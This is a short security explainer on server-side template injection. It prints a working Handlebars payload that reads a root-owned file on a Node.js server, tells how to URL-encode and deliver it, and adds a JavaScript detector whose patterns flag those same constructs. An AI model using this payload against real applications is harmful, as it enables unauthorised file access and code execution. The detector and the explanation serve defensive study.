Server Side Template Injection

Server Side Template Injection (SSTI) is a vulnerability that allows an attacker to inject malicious template code into a web application. This can lead to remote code execution, data leakage, and other security issues.

Example (a Handlebars payload targeting a Node.js application):

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('fs').readFileSync('/root/some-file',{encoding:'utf8',flag:'r'});"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

You will first need to encode this payload using URL encoding before sending it to the server. Once encoded, you can include it in a request to the vulnerable web application via a query parameter, form field, or HTTP header, depending on where the SSTI vulnerability exists.
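
A defender-side counterpart to the delivery step described above, as an added example that is not part of the original post: it URL-decodes query parameters, form fields and headers, then flags Handlebars syntax of the kind used in the payload. The indicator names, the shape of the request object and the sample request are assumptions constructed for illustration.

```javascript
// Added example: flag request values that carry Handlebars template syntax.
const INDICATORS = [
  { name: "handlebars-block-helper", re: /\{\{\s*#\s*(with|each)\b/i },
  { name: "constructor-lookup", re: /\blookup\b[^}]*["']constructor["']/i },
  { name: "node-process-access", re: /process\.mainModule|\brequire\s*\(/i },
  { name: "template-expression", re: /\{\{[\s\S]*?\}\}/ }, // broad: expect benign hits
];

// Undo URL encoding repeatedly (bounded) so double-encoded values are inspected too.
function decodeFully(value, maxRounds = 3) {
  let current = String(value);
  for (let i = 0; i < maxRounds; i++) {
    let next;
    // A malformed escape such as "100%" throws; inspect what we have so far.
    try { next = decodeURIComponent(current.replace(/\+/g, " ")); } catch { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Walk every input channel the page names: query parameters, form fields, headers.
function scanRequest(req) {
  const findings = [];
  const sources = {
    query: [...new URLSearchParams(req.query || "")],
    form: [...new URLSearchParams(req.body || "")],
    header: Object.entries(req.headers || {}),
  };
  for (const [source, pairs] of Object.entries(sources)) {
    for (const [field, raw] of pairs) {
      const decoded = decodeFully(raw);
      const hits = INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
      if (hits.length) findings.push({ source, field, hits });
    }
  }
  return findings;
}

// Constructed sample request: one single-encoded and one double-encoded value.
const sampleRequest = {
  query: "name=" + encodeURIComponent('{{#with "s" as |string|}}{{lookup string.sub "constructor"}}{{/with}}'),
  body: "comment=" + encodeURIComponent(encodeURIComponent("{{#each conslist}}{{this}}{{/each}}")),
  headers: { "user-agent": "Mozilla/5.0", "x-display-name": "alice" },
};
console.log(JSON.stringify(scanRequest(sampleRequest), null, 2));
```

A hit is a signal to investigate, not a fix: the vulnerability is closed by never compiling user-supplied input as template source and passing it only as data to a fixed template.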